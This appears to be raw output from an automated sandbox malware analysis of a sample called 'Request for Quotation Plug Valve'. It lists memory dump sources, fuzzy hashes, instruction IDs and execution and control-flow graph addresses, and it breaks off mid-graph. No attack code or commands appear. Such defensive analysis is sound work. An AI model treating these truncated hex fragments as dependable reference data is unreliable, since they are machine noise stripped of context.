                                                                                      • Instruction Fuzzy Hash: 072125B6504204EFDB05DF14E9C0B26BF65FB98324F20C56DE90A0B256C336E856CBA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2247610189.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_a4d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 83c6a8b857b2cad98b85925901b56fb3287bb4b58464dc698f3d503b8897d282
                                                                                      • Instruction ID: b6e125f64de87217ab1394b97772744c1689639bdbd0eb5d5b129b2f0f3539a7
                                                                                      • Opcode Fuzzy Hash: 83c6a8b857b2cad98b85925901b56fb3287bb4b58464dc698f3d503b8897d282
                                                                                      • Instruction Fuzzy Hash: 042126B9604304EFDB05DF14D9C0B66BBA5FBC4314F20C66DE9094B392C7B6D846CA61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2247610189.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_a4d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bd4ad09f1468819c184b225ec7aae46eb603e35bf6ff2652c22be2249bf1c675
                                                                                      • Instruction ID: 0c1b78d2563ced909b95f9bd184c57e21c8c1883c657dafc56760d394759b568
                                                                                      • Opcode Fuzzy Hash: bd4ad09f1468819c184b225ec7aae46eb603e35bf6ff2652c22be2249bf1c675
                                                                                      • Instruction Fuzzy Hash: AF212F79604200EFCB14DF24D9C0B26BBA1FBC8314F20C5ADE90A0B296C37AD807CA61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                      • Instruction ID: 0c7257259302d344fad4246175a5e8dafad17d6b5a25e4d03d8da3d3178c0cfa
                                                                                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                      • Instruction Fuzzy Hash: 9D11E676504280CFCB16CF10D5C4B16BF71FB94318F24C6A9E8490B656C33AD856CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                      • Instruction ID: c7b1fcdcd414c8c4563eb384fa6e19631b106e6f4423d6a5f0e845047eaf32a3
                                                                                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                      • Instruction Fuzzy Hash: 1E11E6B6504280DFCF16CF10E5C4B16BF71FB94324F24C6A9E8490B656C33AE856CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2247610189.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_a4d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                      • Instruction ID: 461759bf9084614ba5d68b88b1c4dfbe05792de681e6f746128f30cd4a6f9683
                                                                                      • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                      • Instruction Fuzzy Hash: 06119D79504284DFCB15CF14D5C4B15FBA2FB84318F24C6AED84A4B656C33AD84ACBA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2247610189.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_a4d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                      • Instruction ID: 1b3d1dd02b4ac64760593855b3de0a87a3c9e9a0d4d40c1e8e652f73e0c78cbe
                                                                                      • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                      • Instruction Fuzzy Hash: 2C119DB9504284DFCB15CF10D5C4B55FBB1FB84314F24C6ADD8494B6A6C37AD84ACB61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: adcb06670da18dab7fc97ce0705c2ee12a5b85f413850066e45696c7ec79b775
                                                                                      • Instruction ID: 530aa47ae666f48d16136e45c97bb1b49419ee5a428966a85914e1434570a647
                                                                                      • Opcode Fuzzy Hash: adcb06670da18dab7fc97ce0705c2ee12a5b85f413850066e45696c7ec79b775
                                                                                      • Instruction Fuzzy Hash: 67012671404340DAE7104F25EDC4B67BFA8EF41364F18C51AFE080E296C6B99840CAB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e42f94abaa26406407a012d9554aad9785c0c91c6f3695389c5c06e8d8fdb0f5
                                                                                      • Instruction ID: 7aee3670b08d8071b3b6c807180d4b1e4fd6437692dc37fa05a65f4ca6296e99
                                                                                      • Opcode Fuzzy Hash: e42f94abaa26406407a012d9554aad9785c0c91c6f3695389c5c06e8d8fdb0f5
                                                                                      • Instruction Fuzzy Hash: 82F06D72405344AEE7108F16D9C8B66FF98EB91734F18C45AFD084E296C279A844CBB1

                                                                                      Execution Graph

                                                                                      Execution Coverage:17.6%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:75.8%
                                                                                      Total number of Nodes:33
                                                                                      Total number of Limit Nodes:6
                                                                                      execution_graph 19134 2abe018 19135 2abe024 19134->19135 19139 68e295b 19135->19139 19146 68e2968 19135->19146 19136 2abe0c3 19140 68e2928 19139->19140 19141 68e2962 19139->19141 19142 68e2a56 19141->19142 19152 68e992c 19141->19152 19158 68e9328 19141->19158 19162 68e9548 19141->19162 19142->19136 19147 68e298a 19146->19147 19148 68e2a56 19147->19148 19149 68e992c 2 API calls 19147->19149 19150 68e9548 2 API calls 19147->19150 19151 68e9328 LdrInitializeThunk 19147->19151 19148->19136 19149->19148 19150->19148 19151->19148 19156 68e97e3 19152->19156 19153 68e9924 LdrInitializeThunk 19155 68e9a81 19153->19155 19155->19142 19156->19153 19157 68e9328 LdrInitializeThunk 19156->19157 19157->19156 19159 68e933a 19158->19159 19161 68e933f 19158->19161 19159->19142 19160 68e9a69 LdrInitializeThunk 19160->19159 19161->19159 19161->19160 19166 68e9579 19162->19166 19163 68e96d9 19163->19142 19164 68e9924 LdrInitializeThunk 19164->19163 19166->19163 19166->19164 19167 68e9328 LdrInitializeThunk 19166->19167 19167->19166 19168 68e9c18 19169 68e9c1f 19168->19169 19171 68e9c25 19168->19171 19170 68e9328 LdrInitializeThunk 19169->19170 19169->19171 19173 68e9fa6 19169->19173 19170->19173 19172 68e9328 LdrInitializeThunk 19172->19173 19173->19171 19173->19172
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N
                                                                                      • API String ID: 0-1130791706
                                                                                      • Opcode ID: f5923a316392a58a2381163d9d8bd052949db8493fc08c49dced93e8d5b8f505
                                                                                      • Instruction ID: 4b985ee62beb50c64821348efb3ac1b6393115a7ed55be506eac33ce0846bf70
                                                                                      • Opcode Fuzzy Hash: f5923a316392a58a2381163d9d8bd052949db8493fc08c49dced93e8d5b8f505
                                                                                      • Instruction Fuzzy Hash: D073F431D1075A8EDB11EF68C854A9DF7B1FF9A300F11D69AE44867221EB70AAC5CF81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 44f4c5bfb6f5a9649ae40268b6f5f083ec631b1a2f8803f5bcba7115a230133c
                                                                                      • Instruction ID: c9b417b3da0262780fcac4cd495ed8817152b4cc4e92c7688e887c0b24595404
                                                                                      • Opcode Fuzzy Hash: 44f4c5bfb6f5a9649ae40268b6f5f083ec631b1a2f8803f5bcba7115a230133c
                                                                                      • Instruction Fuzzy Hash: FF33F430C146598EDB51EFA8C894A9DF7B1FF99300F10D69AD458B7221EB70AAC5CF81

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 985 68e9548-68e9577 986 68e957e-68e9614 985->986 987 68e9579 985->987 989 68e96b3-68e96b9 986->989 987->986 990 68e96bf-68e96d7 989->990 991 68e9619-68e962c 989->991 992 68e96eb-68e96fe 990->992 993 68e96d9-68e96e6 990->993 994 68e962e 991->994 995 68e9633-68e9684 991->995 997 68e9705-68e9721 992->997 998 68e9700 992->998 996 68e9a81-68e9b7e 993->996 994->995 1012 68e9686-68e9694 995->1012 1013 68e9697-68e96a9 995->1013 1003 68e9b86-68e9b90 996->1003 1004 68e9b80-68e9b85 996->1004 1000 68e9728-68e974c 997->1000 1001 68e9723 997->1001 998->997 1007 68e974e 1000->1007 1008 68e9753-68e9785 1000->1008 1001->1000 1004->1003 1007->1008 1017 68e978c-68e97ce 1008->1017 1018 68e9787 1008->1018 1012->990 1014 68e96ab 1013->1014 1015 68e96b0 1013->1015 1014->1015 1015->989 1020 68e97d5-68e97de 1017->1020 1021 68e97d0 1017->1021 1018->1017 1022 68e9a06-68e9a0c 1020->1022 1021->1020 1023 68e9a12-68e9a25 1022->1023 1024 68e97e3-68e9808 1022->1024 1027 68e9a2c-68e9a47 1023->1027 1028 68e9a27 1023->1028 1025 68e980f-68e9846 1024->1025 1026 68e980a 1024->1026 1036 68e984d-68e987f 1025->1036 1037 68e9848 1025->1037 1026->1025 1029 68e9a4e-68e9a62 1027->1029 1030 68e9a49 1027->1030 1028->1027 1034 68e9a69-68e9a7f LdrInitializeThunk 1029->1034 1035 68e9a64 1029->1035 1030->1029 1034->996 1035->1034 1039 68e98e3-68e98f6 1036->1039 1040 68e9881-68e98a6 1036->1040 1037->1036 1041 68e98fd-68e9922 1039->1041 1042 68e98f8 1039->1042 1043 68e98ad-68e98db 1040->1043 1044 68e98a8 1040->1044 1047 68e9924-68e9925 1041->1047 1048 68e9931-68e9969 1041->1048 1042->1041 1043->1039 1044->1043 1047->1023 1049 68e996b 1048->1049 1050 68e9970-68e99d1 call 68e9328 1048->1050 1049->1050 1056 68e99d8-68e99fc 1050->1056 1057 68e99d3 1050->1057 1060 68e99fe 1056->1060 1061 68e9a03 1056->1061 1057->1056 1060->1061 1061->1022
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 21416727f10c0a661f7b940d07a245f759ba5ebb68aee8bb74b8bbfd527c848d
                                                                                      • Instruction ID: 0ac1eef3cad02850bf0890383d3026f9ba20804c649122a445f4ac9f74b8dfd4
                                                                                      • Opcode Fuzzy Hash: 21416727f10c0a661f7b940d07a245f759ba5ebb68aee8bb74b8bbfd527c848d
                                                                                      • Instruction Fuzzy Hash: 16F10874D00228CFDB54DFA9D884B9DFBB2BF89304F1482A9D848AB355DB719986CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 65807079cb92bb665269e20334f3d21569a2d195623cac17442817fc02d2ee95
                                                                                      • Instruction ID: e5cd3f4f1c634280e0954aa7087fa0050b029a937cb8cb077fe19389053bf4d9
                                                                                      • Opcode Fuzzy Hash: 65807079cb92bb665269e20334f3d21569a2d195623cac17442817fc02d2ee95
                                                                                      • Instruction Fuzzy Hash: F9827035A00209DFCB16CFA8C584AEEBBF6FF49314F158559E4059B2A7DB70E981CB60

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1532 68e0b30-68e0b50 1533 68e0b57-68e0bd9 1532->1533 1534 68e0b52 1532->1534 1536 68e0c3e-68e0c54 1533->1536 1534->1533 1537 68e0bdb-68e0be4 1536->1537 1538 68e0c56-68e0ca0 1536->1538 1539 68e0beb-68e0c34 1537->1539 1540 68e0be6 1537->1540 1547 68e0d0b-68e0d0c 1538->1547 1548 68e0ca2-68e0ce3 1538->1548 1545 68e0c3b 1539->1545 1546 68e0c36 1539->1546 1540->1539 1545->1536 1546->1545 1549 68e0d0d-68e0d3e 1547->1549 1554 68e0d05-68e0d06 1548->1554 1555 68e0ce5-68e0d03 1548->1555 1553 68e0d45-68e0dac 1549->1553 1561 68e16fe-68e1733 1553->1561 1562 68e0db2-68e0dd3 1553->1562 1556 68e0d07-68e0d09 1554->1556 1555->1556 1556->1549 1565 68e16db-68e16f7 1562->1565 1566 68e16fd 1565->1566 1567 68e0dd8-68e0de1 1565->1567 1566->1561 1568 68e0de8-68e0e4e 1567->1568 1569 68e0de3 1567->1569 1573 68e0e55-68e0edf 1568->1573 1574 68e0e50 1568->1574 1569->1568 1580 68e0ef1-68e0ef8 1573->1580 1581 68e0ee1-68e0ee8 1573->1581 1574->1573 1582 68e0eff-68e0f0c 1580->1582 1583 68e0efa 1580->1583 1584 68e0eef 1581->1584 1585 68e0eea 1581->1585 1586 68e0f0e 1582->1586 1587 68e0f13-68e0f1a 1582->1587 1583->1582 1584->1582 1585->1584 1586->1587 1588 68e0f1c 1587->1588 1589 68e0f21-68e0f78 1587->1589 1588->1589 1592 68e0f7f-68e0f96 1589->1592 1593 68e0f7a 1589->1593 1594 68e0f98-68e0f9f 1592->1594 1595 68e0fa1-68e0fa9 1592->1595 1593->1592 1596 68e0faa-68e0fb4 1594->1596 1595->1596 1597 68e0fbb-68e0fc4 1596->1597 1598 68e0fb6 1596->1598 1599 68e16ab-68e16b1 1597->1599 1598->1597 1600 68e0fc9-68e0fd5 1599->1600 1601 68e16b7-68e16d1 1599->1601 1602 68e0fdc-68e0fe1 1600->1602 1603 68e0fd7 1600->1603 1607 68e16d8 1601->1607 1608 68e16d3 1601->1608 1605 68e1024-68e1026 1602->1605 1606 68e0fe3-68e0fef 1602->1606 1603->1602 1609 68e102c-68e1040 1605->1609 1610 68e0ff6-68e0ffb 1606->1610 1611 68e0ff1 1606->1611 1607->1565 1608->1607 1613 68e1689-68e1696 1609->1613 1614 68e1046-68e105b 1609->1614 1610->1605 1612 68e0ffd-68e100a 1610->1612 1611->1610 1615 68e100c 1612->1615 1616 68e1011-68e1022 1612->1616 1619 68e1697-68e16a1 1613->1619 1617 68e105d 1614->1617 1618 68e1062-68e10e8 1614->1618 1615->1616 1616->1609 1617->1618 1626 68e10ea-68e1110 1618->1626 1627 68e1112 1618->1627 1620 68e16a8 1619->1620 1621 68e16a3 1619->1621 1620->1599 1621->1620 1628 68e111c-68e113c 1626->1628 1627->1628 1630 68e12bb-68e12c0 1628->1630 1631 68e1142-68e114c 1628->1631 1634 68e1324-68e1326 1630->1634 1635 68e12c2-68e12e2 1630->1635 1632 68e114e 1631->1632 1633 68e1153-68e117c 1631->1633 1632->1633 1637 68e117e-68e1188 1633->1637 1638 68e1196-68e1198 1633->1638 1636 68e132c-68e134c 1634->1636 1648 68e130c 1635->1648 1649 68e12e4-68e130a 1635->1649 1640 68e1352-68e135c 1636->1640 1641 68e1683-68e1684 1636->1641 1643 68e118f-68e1195 1637->1643 1644 68e118a 1637->1644 1639 68e1237-68e1246 1638->1639 1650 68e124d-68e1252 1639->1650 1651 68e1248 1639->1651 1645 68e135e 1640->1645 1646 68e1363-68e138c 1640->1646 1647 68e1685-68e1687 1641->1647 1643->1638 1644->1643 1645->1646 1655 68e138e-68e1398 1646->1655 1656 68e13a6-68e13b4 1646->1656 1647->1619 1652 68e1316-68e1322 1648->1652 1649->1652 1653 68e127c-68e127e 1650->1653 1654 68e1254-68e1264 1650->1654 1651->1650 1652->1636 1659 68e1284-68e1298 1653->1659 1657 68e126b-68e127a 1654->1657 1658 68e1266 1654->1658 1660 68e139f-68e13a5 1655->1660 1661 68e139a 1655->1661 1662 68e1453-68e1462 1656->1662 1657->1659 1658->1657 1664 68e129e-68e12b6 1659->1664 1665 68e119d-68e11b8 1659->1665 1660->1656 1661->1660 1666 68e1469-68e146e 1662->1666 1667 68e1464 1662->1667 1664->1647 1668 68e11bf-68e1229 1665->1668 1669 68e11ba 1665->1669 1670 68e1498-68e149a 1666->1670 1671 68e1470-68e1480 1666->1671 1667->1666 1688 68e122b 1668->1688 1689 68e1230-68e1236 1668->1689 1669->1668 1672 68e14a0-68e14b4 1670->1672 1673 68e1487-68e1496 1671->1673 1674 68e1482 1671->1674 1675 68e14ba-68e1523 1672->1675 1676 68e13b9-68e13d4 1672->1676 1673->1672 1674->1673 1686 68e152c-68e167f 1675->1686 1687 68e1525-68e1527 1675->1687 1678 68e13db-68e1445 1676->1678 1679 68e13d6 1676->1679 1693 68e144c-68e1452 1678->1693 1694 68e1447 1678->1694 1679->1678 1690 68e1680-68e1681 1686->1690 1687->1690 1688->1689 1689->1639 1690->1601 1693->1662 1694->1693
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ca329430b1dff49e8abd0bd889a6b8152d1c6997cb60340c554dfe65973d47d9
                                                                                      • Instruction ID: 127906eac873710e2882291985a15661cce3c181fe49a674e03612d9ca39b35a
                                                                                      • Opcode Fuzzy Hash: ca329430b1dff49e8abd0bd889a6b8152d1c6997cb60340c554dfe65973d47d9
                                                                                      • Instruction Fuzzy Hash: D572ED74E002698FDB64DF69C984BEDBBB2BB4A304F1481E9D449A7365DB709E81CF40

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2783 2ab69a0-2ab69e6 2784 2ab69ec-2ab69fa 2783->2784 2785 2ab6fb1-2ab700c call 2ab7118 2783->2785 2789 2ab6a28-2ab6a39 2784->2789 2790 2ab69fc-2ab6a0d 2784->2790 2803 2ab700e-2ab7012 2785->2803 2804 2ab705c-2ab7060 2785->2804 2791 2ab6a3b-2ab6a3f 2789->2791 2792 2ab6aaa-2ab6abe 2789->2792 2790->2789 2797 2ab6a0f-2ab6a1b 2790->2797 2793 2ab6a5a-2ab6a63 2791->2793 2794 2ab6a41-2ab6a4d 2791->2794 2930 2ab6ac1 call 2ab6fc8 2792->2930 2931 2ab6ac1 call 2ab69a0 2792->2931 2801 2ab6a69-2ab6a6c 2793->2801 2802 2ab6d6c 2793->2802 2799 2ab6ddb-2ab6e26 2794->2799 2800 2ab6a53-2ab6a55 2794->2800 2805 2ab6d71-2ab6dd4 2797->2805 2806 2ab6a21-2ab6a23 2797->2806 2798 2ab6ac7-2ab6acd 2807 2ab6acf-2ab6ad1 2798->2807 2808 2ab6ad6-2ab6add 2798->2808 2880 2ab6e2d-2ab6eac 2799->2880 2811 2ab6d62-2ab6d69 2800->2811 2801->2802 2812 2ab6a72-2ab6a91 2801->2812 2802->2805 2813 2ab7021-2ab7028 2803->2813 2814 2ab7014-2ab7019 2803->2814 2809 2ab7062-2ab7071 2804->2809 2810 2ab7077-2ab708b 2804->2810 2805->2799 2806->2811 2807->2811 2815 2ab6bcb-2ab6bdc 2808->2815 2816 2ab6ae3-2ab6afa 2808->2816 2817 2ab709d-2ab70a7 2809->2817 2818 2ab7073-2ab7075 2809->2818 2819 2ab7093-2ab709a 2810->2819 2927 2ab708d call 2aba088 2810->2927 2928 2ab708d call 2aba0e8 2810->2928 2929 2ab708d call 2ab9dd0 2810->2929 2812->2802 2847 2ab6a97-2ab6a9d 2812->2847 2821 2ab70fe-2ab7113 2813->2821 2822 2ab702e-2ab7035 2813->2822 2814->2813 2840 2ab6bde-2ab6beb 2815->2840 2841 2ab6c06-2ab6c0c 2815->2841 2816->2815 2837 2ab6b00-2ab6b0c 2816->2837 2825 2ab70a9-2ab70af 2817->2825 2826 2ab70b1-2ab70b5 2817->2826 2818->2819 2822->2804 2827 2ab7037-2ab703b 2822->2827 2830 2ab70bd-2ab70f7 2825->2830 2826->2830 2833 2ab70b7 2826->2833 2834 2ab704a-2ab7051 2827->2834 2835 2ab703d-2ab7042 2827->2835 2830->2821 2833->2830 2834->2821 2836 2ab7057-2ab705a 2834->2836 2835->2834 2836->2819 2845 2ab6b12-2ab6b7e 2837->2845 2846 2ab6bc4-2ab6bc6 2837->2846 2844 2ab6c27-2ab6c2d 2840->2844 2856 2ab6bed-2ab6bf9 2840->2856 2843 2ab6c0e-2ab6c1a 2841->2843 2841->2844 2849 2ab6ec3-2ab6f26 2843->2849 2850 2ab6c20-2ab6c22 2843->2850 2851 2ab6d5f 2844->2851 2852 2ab6c33-2ab6c50 2844->2852 2882 2ab6bac-2ab6bc1 2845->2882 2883 2ab6b80-2ab6baa 2845->2883 2846->2811 2847->2785 2854 2ab6aa3-2ab6aa7 2847->2854 2907 2ab6f2d-2ab6fac 2849->2907 2850->2811 2851->2811 2852->2802 2874 2ab6c56-2ab6c59 2852->2874 2854->2792 2860 2ab6bff-2ab6c01 2856->2860 2861 2ab6eb1-2ab6ebc 2856->2861 2860->2811 2861->2849 2874->2785 2878 2ab6c5f-2ab6c85 2874->2878 2878->2851 2889 2ab6c8b-2ab6c97 2878->2889 2882->2846 2883->2882 2890 2ab6d5b-2ab6d5d 2889->2890 2891 2ab6c9d-2ab6d15 2889->2891 2890->2811 2909 2ab6d43-2ab6d58 2891->2909 2910 2ab6d17-2ab6d41 2891->2910 2909->2890 2910->2909 2927->2819 2928->2819 2929->2819 2930->2798 2931->2798
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9e904e01f14eed7eed363aa6b4920f47331e10d47276d6106effda8aa4ebefc
                                                                                      • Instruction ID: 460f9a067e610eb47e6725c88cf1e622974aa1abbf13e9f005f047f90c11c385
                                                                                      • Opcode Fuzzy Hash: d9e904e01f14eed7eed363aa6b4920f47331e10d47276d6106effda8aa4ebefc
                                                                                      • Instruction Fuzzy Hash: 13129E70A002198FDB19DF69C894BAEBBFAFF88714F148129E5059B396DF709D41CB90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3188 2ab7118-2ab713b 3189 2ab713d-2ab7143 3188->3189 3190 2ab7146-2ab7166 3188->3190 3189->3190 3193 2ab7168 3190->3193 3194 2ab716d-2ab7174 3190->3194 3195 2ab74fc-2ab7505 3193->3195 3196 2ab7176-2ab7181 3194->3196 3197 2ab750d-2ab7519 3196->3197 3198 2ab7187-2ab719a 3196->3198 3203 2ab751b-2ab7521 3197->3203 3204 2ab74c6-2ab74cb 3197->3204 3201 2ab719c-2ab71aa 3198->3201 3202 2ab71b0-2ab71cb 3198->3202 3201->3202 3209 2ab7484-2ab748b 3201->3209 3212 2ab71ef-2ab71f2 3202->3212 3213 2ab71cd-2ab71d3 3202->3213 3205 2ab74ce 3203->3205 3206 2ab7523-2ab7549 3203->3206 3204->3205 3210 2ab74d3-2ab74d9 3205->3210 3217 2ab754b-2ab7550 3206->3217 3218 2ab7552-2ab7556 3206->3218 3209->3195 3221 2ab748d-2ab748f 3209->3221 3210->3197 3216 2ab74db-2ab74e0 3210->3216 3214 2ab71f8-2ab71fb 3212->3214 3215 2ab734c-2ab7352 3212->3215 3219 2ab71dc-2ab71df 3213->3219 3220 2ab71d5 3213->3220 3214->3215 3224 2ab7201-2ab7207 3214->3224 3222 2ab7358-2ab735d 3215->3222 3223 2ab743e-2ab7441 3215->3223 3225 2ab74e2-2ab74e4 3216->3225 3226 2ab74b6-2ab74b9 3216->3226 3227 2ab755c-2ab755d 3217->3227 3218->3227 3228 2ab7212-2ab7218 3219->3228 3229 2ab71e1-2ab71e4 3219->3229 3220->3215 3220->3219 3220->3223 3220->3228 3230 2ab749e-2ab74a4 3221->3230 3231 2ab7491-2ab7496 3221->3231 3222->3223 3234 2ab7508 3223->3234 3235 2ab7447-2ab744d 3223->3235 3224->3215 3233 2ab720d 3224->3233 3225->3234 3239 2ab74e6-2ab74e9 3225->3239 3226->3234 3236 2ab74bb-2ab74c0 3226->3236 3237 2ab721a-2ab721c 3228->3237 3238 2ab721e-2ab7220 3228->3238 3240 2ab71ea 3229->3240 3241 2ab727e-2ab7284 3229->3241 3230->3197 3232 2ab74a6-2ab74ab 3230->3232 3231->3230 3242 2ab74ad-2ab74b2 3232->3242 3243 2ab74f0-2ab74f3 3232->3243 3233->3223 3234->3197 3245 2ab744f-2ab7457 3235->3245 3246 2ab7472-2ab7476 3235->3246 3236->3225 3247 2ab74c2-2ab74c4 3236->3247 3248 2ab722a-2ab7233 3237->3248 3238->3248 3239->3243 3240->3223 3241->3223 3244 2ab728a-2ab7290 3241->3244 3242->3234 3250 2ab74b4 3242->3250 3243->3234 3249 2ab74f5-2ab74fa 3243->3249 3251 2ab7292-2ab7294 3244->3251 3252 2ab7296-2ab7298 3244->3252 3245->3197 3253 2ab745d-2ab746c 3245->3253 3246->3209 3256 2ab7478-2ab747e 3246->3256 3247->3204 3247->3210 3254 2ab7246-2ab726e 3248->3254 3255 2ab7235-2ab7240 3248->3255 3249->3195 3249->3221 3250->3236 3257 2ab72a2-2ab72b9 3251->3257 3252->3257 3253->3202 3253->3246 3268 2ab7362-2ab7398 3254->3268 3269 2ab7274-2ab7279 3254->3269 3255->3223 3255->3254 3256->3196 3256->3209 3263 2ab72bb-2ab72d4 3257->3263 3264 2ab72e4-2ab730b 3257->3264 3263->3268 3272 2ab72da-2ab72df 3263->3272 3264->3234 3274 2ab7311-2ab7314 3264->3274 3275 2ab739a-2ab739e 3268->3275 3276 2ab73a5-2ab73ad 3268->3276 3269->3268 3272->3268 3274->3234 3277 2ab731a-2ab7343 3274->3277 3278 2ab73bd-2ab73c1 3275->3278 3279 2ab73a0-2ab73a3 3275->3279 3276->3234 3280 2ab73b3-2ab73b8 3276->3280 3277->3268 3292 2ab7345-2ab734a 3277->3292 3281 2ab73c3-2ab73c9 3278->3281 3282 2ab73e0-2ab73e4 3278->3282 3279->3276 3279->3278 3280->3223 3281->3282 3284 